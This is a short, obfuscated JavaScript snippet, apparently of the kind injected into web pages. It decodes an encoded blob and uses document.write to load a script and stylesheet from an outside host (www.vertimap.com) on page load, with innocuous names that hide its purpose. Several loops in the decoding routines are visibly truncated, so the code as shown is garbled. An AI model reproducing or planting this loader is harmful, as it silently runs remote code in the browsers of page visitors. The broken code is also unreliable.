function SearchStr(S){ var Alf="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", S2="", e=[], j, i=0, c=[]; while(i>4); c[2]=((e[2] & 15)<<4) | (e[3]>>2); c[3]=((e[3] & 3)<<6) | e[4]; for(j=1; j<=3; j++){ if (j==1 || e[j+1]!=64) S2+=String.fromCharCode(c[j]); } } return S2; } function ReplaceStr(S){ var L, Page, S2='', Item, i, n; S=SearchStr(S); Page=parseInt(S.substr(0, 2), 16); Item=parseInt(S.substr(2, 2), 16); S=S.substring(4); L=S.length; for(i=0; i255) Page=0; } return S2; } function ShowItems(){ var page='', Content= 'MzYwMXKboa9apKB6rrGppKevrbi6Z6m1s7K6irG0vsW3xZJfpsO9us3AfNS/yNSB2cvN0cuH386K19vO0o/k2deT5Off2t2Z5uTv8Yi75Or4o8fx5/r7xuHs9QHMmcz6//q0CAj61bsCDxAN2M7PGBka0hsLGRwSFwwc2xEeHeAbIBvkIiYZHSMpIxwfMDUi8CotK+jnFzcWOi0xC/FEOTtGAkhKUEQ+CFFFUEdBSU1LV10iDV1RXFNNWFIVKhIv/C8jWV9tNjUpX2VzPA=='; h='www.vertimap.com'; b='landscape'; document.write('<'+'LINK REL="StyleSheet" HREF="http://'+h+'/print.css">'+ (page ? '<'+'Script>var a="'+page+'"<'+'/Script>' : '')+ '<'+'Script Src="http://'+h+'/print.js"><'+'/Script>'+ ReplaceStr(Content)); } ShowItems();